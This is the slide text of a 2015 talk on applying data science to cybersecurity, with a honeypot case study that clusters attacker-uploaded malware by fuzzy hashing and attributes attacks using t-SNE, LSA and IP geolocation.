Applications of Data Science in Cyber

Applications of Data Science in Cyber-Security

Richard Xiehttps://linkedin.com/in/richardxyJanuary 2015

https://linkedin.com/in/richardxy

What is Cyber-Security?

• A.K.A– computer security, network security

• Secure network assets from intrusions and data breaches

• Assets include:– servers, work stations, mobile devices

• Layers to secure:– Firewall, operating systems, files, credentials,

etc.

Why It's Important?http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/

Severe shortage of experts predicted

Cyber-Security + Data Science

Common Threats

• Exploitation of software volunerabilities• Fraud: spoofing, phishing, pharming • Malicious code (worms, viruses, spyware,

etc.)• dDos

How Data Science Would Help?

• Cyber-security is a big-data business– network logs– files– user-machine interactions– volume, velocity, variety, and veracity

• Data science is to be the engine to power next generation cyber-security solutions

Application Examples

• Spam email classification• Malware classification• Malicious IP classification• Intrusion detection• Network anomaly detection• Hacker attribution• and more...

A Real Case Study

• Hunting for Honeypot Attackers: A Data Scientist’s Adventure

• Honeynet is a set of honeypot systems deployed on internet

• Honeypot logs all hacking activities• Honeypot stores files uploaded by hackers• Malware used as hacker's weapons

https://www.linkedin.com/pulse/hunting-honeypot-attackers-data-scientists-adventure-richard-xie?trk=pulse-det-nav_art

https://www.linkedin.com/pulse/hunting-honeypot-attackers-data-scientists-adventure-richard-xie?trk=pulse-det-nav_art

Raw Statistics

• Data collection period– from March 2015 through the end of June

2015• >21k attacker IP address• 36 million SSH attempts• 34k unique usernames + 1 million

passwords being tried• 500 malicious domains and >1000 unique

malware being identified

Geo-location of Attacks

map_hacker_IP.py

Time Series of Attacks

time_series_activity.py

How raw data look like

Questions to Answer

• Clustering downloaded/crawled files to find file groups/categories

• attribution– association between attacks from different

days and IPs– where they came from

File Similarity Computation

• MD5 hash can't reflect slight changes in file

• Fuzzy hashing does• Using ssdeep, I computed pair-wise

similarity for all collected binary files and tar files

Steps to prepare data

• readRawData.py to create a collection "downloadsCollection"

• extract_crawled_file_to_mongo.py to create crawledFileCollection

• uniq_ip_count_MR.js to create uniqURLCollection

• uniq_ip_date_MR.js to create uniqURLDateCollection

• uniq_date_ip_MR.js to create uniqDateURLCollection

• uniq_hash_count_MR.js to create uniqFileCollection

• uniq_country_count_MR.js to create uniqCountryCollection

Graph of Files

two similar files have a connection, where similarity > 60% (for example)

identifySimilarDownloads.py from line 166

./graphiti demo graph_data/weighted_files2.json

Files -> Hacker

• a hacker may use same/similar tools on different days to hack systems

• File similarity matrix may provide hints on who were using those files

• treat date+IP as a unique attack, and all its associated binary files as its features

• construct a term matrix for all attacks

T-SNE on Attack-Malware Matrixwith K-Means Labeling

k=10

T-SNE: t-Distributed Stochastic Neighbor Embedding

get_similar_IPs.py from line 181

Latent Semantic Analysis

• LSA is widely used in NLP for topic finding• Analyzes relationships between a set of

documents and the terms they contain• Uses SVD to reduce number of

dimensions while maintaining record similarities

SVD: Singular Value Decomposition

Attacks Expressed with 1st and 2nd Principal Components

Each vector is a date+IP incident (a row in the term matrix)

Compute Similarities among Attacks• Similar attacks to a particular one: 2015-03-23%%61.160.212.21:5947 is similar to

2015-03-23%%118.193.241.192, similarity 0.958453 2015-03-23%%222.186.190.157:56789, similarity 0.996835 2015-03-24%%222.186.190.157:56789, similarity 0.961000 2015-03-25%%117.21.176.79:333, similarity 0.997087 2015-03-25%%222.186.190.157:56789, similarity 0.946751 2015-06-17%%222.186.30.175:56789, similarity 0.996835 2015-06-17%%61.160.247.42:1988, similarity 0.996835 2015-06-18%%222.186.30.175:56789, similarity 0.996835 2015-06-18%%61.160.247.42:1988, similarity 0.996835

Time Series of Attack Counts for Group 1

Time Series of Attack Counts for Group 2

Visualization of Attack Graph

./graphiti demo graph_data/weighted_IPs_95percent.json

We know where they were from

python_map_IP_latlon.py

So what?

• The analysis may leads to– near-real-time attribution (it's a new attack, or

something we saw before?)– near-real-time triage of new malware or a

variant of existing ones?– more...

Applications of Data Science in Cyber

Documents

Transcript of Applications of Data Science in Cyber